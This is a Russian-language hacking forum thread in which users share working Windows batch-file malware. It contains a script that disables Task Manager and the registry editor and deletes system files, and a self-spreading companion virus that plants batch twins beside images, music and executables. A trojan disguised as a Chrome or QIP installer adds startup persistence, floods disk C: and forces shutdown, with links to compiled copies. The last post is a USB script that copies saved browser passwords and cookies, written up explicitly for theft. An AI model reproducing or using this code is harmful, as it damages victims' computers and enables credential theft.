Здесь уважаемые пользователи выкладываем коды *.BAT вирусов и не забудьте оставить описание, что делает вирус!
Выкладываем коды *.BAT вирусов
Сообщений 1 страница 14 из 14
Поделиться22009-05-08 20:01:46
Скопировать код → Вставить в блокнот → Сохранить как имя вируса.bat (Самому файл не запускать!)
Вирус выполняет следующие задачи:
- Запретить ТаскМена
- Удалить системные DLL
- Удалить все драйвера
- Запретить запуск прог
- Запретить RegEdit
- Самоликвидация
- Удалить Панель Управления
- Удалить Блокнот
- Учетная запись "ЛОХ"
- Название винта "ВИНТ ЛОХа
@echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul del "%0" >nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul del "%SystemRoot%\notepad.exe" >nul net user "ЛОХ" /add >nul label C:ВИНТ ЛОХа >nul
Поделиться32009-06-19 12:02:39
Но это были всё пистики, а теперь тыковки. Внимание. Представляю
вам мега-вирус, он заражает *.jpg *.mp3 *.doc *.htm? *.xls. Причем заражает
не только в текущем каталоге, но и надкаталоге, поэтому не удивляйтесь,
если при его испытании, он расползется по всему винту. Вот он:
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Поделиться42009-06-19 12:03:50
Вам известно, что JPG-файлы - это картинки. И вы наверно слышали,
что заражать их нельзя. Но на самом деле заражать можно почти все.
Вот смотрите. Вирус заражает *.JPG в текущем каталоге.
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Поделиться52009-06-19 12:05:43
Как видите, этот вирус является BAT-файлом. Принцип работы
такой же как и у BAT-вирусов. Если вы не поняли как все это работает, то объясняю.
Каждая вирусная строка имеет метку "MrWeb", в каких-то строках эта метка не является
пассивной, т.е. учавствует в работе вируса, например во-второй строке вируса
"if '%1=='In_ goto MrWebin" эта метка содержится в метке "MrWebin", а вот в первой
строке эта метка является пассивной и поэтому она заключена в знаки процента.
Дак вот, при старте вируса происходит копирование вирусных строк (с меткой) в
специальный файл "c:\MrWeb.bat", конечно это происходит если данный файл не был раньше
создан вирусом. Дальше вирус ищет *.JPG, если находит то заражает их, для этого вирус
вызывает файл c:\MrWeb.bat и передает ему имя файла, который следует заразить.
Принцип заражения: например найден файл 001.JPG, вирус создает вирусный файл 001.JPG.bat,
т.е. принцип компаньон-вируса. Юзер захочет посмотреть картинку, щелкнет по нему мышкой
и увидит то, что хотел увидеть, т.е. картинку, а тем временем заразятся все другие картинки.
Круто? И это еще не все, кто-то может еще сомневается, что можно заразить любой файл...
Так, какие типы файлов будем заражать? Файлы *.mp3 ? Музыку значит. Нет проблем.
Смотрите:
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat:MrWebru
for %%g in (*.mp3) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Поделиться62009-06-19 12:06:41
олько знайте, если вы запускали первый пример вируса,
а теперь хотите с этим поприкалываться, то удалите сначала специальный файл
"c:\MrWeb.bat", а то будете потом говорить, что mp3 ни3я заразить...
Чтобы еще-то заразить... Давайте что-нибудь из классики, например *.EXE. Так...
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.exe) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo %2>>%2.bat%[MrWeb]%
:MrWeben
Поделиться72009-06-19 12:07:30
чтите, что этот пример от предыдущего отличается не только
банальным "*.exe", но и убиранием вызова виндовской программы start.
Что? *.txt заразить? Можно, хотя и не совсем нужно. Но я же говорил,
что заражать можно все, значит получайте:
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.txt) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Поделиться82011-04-15 18:08:58
Прикольно
Поделиться92011-04-15 18:36:54
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.txt) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
а что если не так а так:
@echo off%[MrWeb]%
if %1==In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.txt) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Поделиться102012-01-21 02:39:40
Вирус маскируется под дситрибутив Google Сhrome или qip8095, кликая по .exe файлу (Google setup.exe или qip8095),
вы действительно запустите инсталятор,
но в фоновом режиме вирус добавляет себя в пользовательскую автозагрузку в реестре,
предварительно скопировав себя в системную директорию \System32, так же туда он копирует вспомогательное
приложение которое будет закрывать Диспетчер задач, даже если вы включите его в системе (сразу же после запуска
дистрибутива вирус блокирует Диспетчер задач и Редактор реестра),
через 20 секунд после запуска вирус выкинет досовское окошко со всякими неприятными записями,
которое в свою очередь выкинет предупреждение о
КРИТИЧЕСКОЙ ОШИБКЕ СИСТЕМЫ и оповестит о том что ваш пк вырубится через 1 минуту (всё это конечно злая шутка,
кроме выключения пк)
После запуска windows начинается самое интересное, вирус начинает в фоновом режиме копировать
содержимое всех носителей на пк на диск с системой, в папки с системными атрибутами, и в последствии
размножает всё накопированное в геометрической прогрессии. Процесс заполнения диска длится достаточно
медленно, что позволяет жертве далеко не сразу обнаружить последствия вызванные вирусом)
Фоновое копирование может сильно замедлить работу пК!!!
Засоряться будет только диск "С:\", поэтому если по какой-то неизвестной причине, криворукости например,
у вас отсутствует локальный диск с месткой "С", то вирус работать не будет)
Если система стоит не на диске "С:\", то засоряться всё равно будет диск "С:\"))
Испытывал на 3х пк, при наличии деактиватора бояться нечего, запустив "Kill VIR.exe"
всё вернётся в прежнее состояние, почистятся ключи реестра созданные вирусом,
удалится вирус и его вспомогательные файлы, так же удалится и весь мусор созданный вирусом на локальном диске "С:\"
Вирус скомпилирован
Вот коды исполняемых файлов в .bat:
echo off
copy "System32.exe" %SystemRoot%\system32\System32.exe
copy "MailAg.exe" %SystemRoot%\system32\MailAg.exe
copy "system.bat" %SystemRoot%\system32\system.bat
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Mail /t REG_SZ /d %SystemRoot%\syswow64\MailAg.exe
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Mailag /t REG_SZ /d %SystemRoot%\system32\MailAg.exe
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System32 /t REG_SZ /d %SystemRoot%\system32\System32.exe
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System32*64 /t REG_SZ /d %SystemRoot%\syswow64\System32.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
start ChromeUpdate.exe
ping -n 1 -w 20000 192.168.254.254 >nul
start system.bat
exit
______________________________________________________________________________
echo off
mkdir C:\Users\Public\Loca
xcopy L:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy E:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy A:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy G:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy F:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy M:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy D:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy C:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy C:\Windows C:\Users\Public\Loca\ /S /E /y /H /C
xcopy C:\Windows\System32 C:\Users\Public\Loca\ /S /E /y /H /C
mkdir C:\Users\Public\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local1
xcopy C:\Users\Public\Local C:\Users\Public\Local1\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae\Locar
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae\Locar\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae\Locar\Locat
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae\Locar\Locat\ /S /E /y /H /C
mkdir C:\Users\Public\Local2
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
start system.bat
________________________________________________________________________________________
:loop
taskkill /im taskmgr.exe /t /f
taskkill /im mmc.exe /t /f
taskkill /im regedit.exe /t /f
goto loop
________________________________________________________________________________________
echo off
shutdown.exe -s -t 60 -c "CRITICAL SYSTEM ERROR! YOU HAVE 1 MINUTE"
echo OBNARUZHENA KRITICHESKAYA OSHIBKA SISTEMY!!! / THE CRITICAL ERROR OF SYSTEM IS FOUND OUT!!!
ping -n 1 -w 5000 192.168.254.254 >nul
echo SROCHNO PRIMITE MERY!!! / URGENTLY TAKE MEASURES!!!
ping -n 1 -w 5000 192.168.254.254 >nul
echo ZAPUSHEN PROCESS RAZMAGNICHIVANIYA ZHOSTKOGO DISKA / PROCESS OF THE DEMAGNETIZING OF THE HARD DISK IS STARTED
ping -n 1 -w 5000 192.168.254.254 >nul
:loop
echo CRITICAL SYSTEM ERROR!!!
goto loop
_______________________________________________________________________________________
Вирус конвертировал из .bat в .exe и собрал все исполняемые файлы в один exe-шник, при запуске тот распаковывается в темпах, поэтому весь процесс проходит в фоновом режиме.
Вот ссылки на готовые, скомпилированные в .exe вирусы:
http://letitbit.net/download/96246.90eb … 5.exe.html
http://letitbit.net/download/40552.4145 … p.exe.html
Внутри архива лежит деактиватор, который подчистит всё что натворит вирус и вернёт в исходное состояние, написанный тоже в блокноте с расширением .bat, вот его код:
taskkill /im "google setup.exe" /t /f
taskkill /im System32.exe /t /f
taskkill /im xcopy.exe /t /f
taskkill /im Mailag.exe /t /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System32 /f
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Mailag /f
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System32*64 /f
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Mail /f
del C:\Windows\System32\System32.exe
del C:\Windows\System32\Mailag.exe
del C:\Windows\System32\system.bat
del c:\windows\syswow64\system.bat
del c:\windows\syswow64\Mailag.exe
del c:\windows\syswow64\System32.exe
del c:\windows\syswow32\system.bat
del c:\windows\syswow32\Mailag.exe
del c:\windows\syswow32\System32.exe
shutdown.exe -a
rmdir C:\Users\Public\Loca /s /q
rd C:\Users\Public\Loca /s /q
rmdir C:\Users\Public\Local /s /q
rd C:\Users\Public\Local /s /q
rmdir C:\Users\Public\Local1 /s /q
rd C:\Users\Public\Local1 /s /q
rmdir C:\Users\Public\Local2 /s /q
rd C:\Users\Public\Local2 /s /q
pause
Отредактировано myxan (2012-01-21 08:24:40)
Поделиться112012-03-26 09:40:49
Как убрать этот долбаный вирус (Google Сhrome или qip8095 )
Поделиться122012-03-26 09:42:11
Я в этом не разбираюсь (дуб дубом )
Поделиться132014-10-09 03:52:07
цены бы не было если бы добавили обозначение каждой строки!
Поделиться142017-03-06 00:08:36
Прокаченный Сниффер для флэшки
создаем на флэшке папку "new" или как хотите(потом измените в коде).
в этой папке создаём файл который должен будет потом "типо" открыться это может быть(.pptx,.exe,.mp3,.mp4,и т д).
создаем блокнот и пишем этот код:
@echo off cd/d I:\ (ВМЕСТО "I" ставим "букву" вашей флэшки) cd new start=(файл который должен запускаться) md %~d0\Mozilla md %~d0\Opera md %~d0\Google md %~d0\Yandex md %~d0\Amigo CD/D %APPDATA%\Opera\Opera\ copy /y wand.dat %~d0\Opera\ copy /y cookies.dat %~d0\Opera\ cd %AppData%\Mozilla\Firefox\Profiles\*.default copy /y cookies.sqlite %~d0\Mozilla copy /y key3.db %~d0\Mozilla copy /y signons.sqlite %~d0\Mozilla copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla cd %localappdata%\Google\Chrome\User Data\Default copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google" cd %localappdata%\Yandex\YandexBrowser\User Data\Default copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex" cd %localappdata%\Amigo\User Data\Default copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo" cd/d I:\ (ВМЕСТО "I" ставим "букву" вашей флэшки) move I:\Google \new (тут и ниже вводим вместо "new" название созданной папки) move I:\Yandex \new move I:\Amigo \new move I:\Opera \new move I:\Mozilla \new cd I:\new (ВМЕСТО "I" ставим "букву" (и название папки) вашей флэшки) ipconfig > ip.txt del %0 exid
после окончания убираем слова со скобками, сохраняем в разрешение .bat в папку на флэшке.
Создаём ярлык и помещаем его в корневую папку флэшки. Называем его как вам надо (так чтоб думали что это обычная (презентация, музыка, видео, и т д), и настраиваем иконку в свойствах файла.
ВСЁ при запуске файла все cookie файлы браузеров сохраняются в созданную папку(new).
Всё это нужно для кражи логинов и паролей с любого пк на Windows начаная с 7.
Всё эти действия уголовно наказуемые.
Отредактировано Daniil Shamraev (2017-03-06 00:13:35)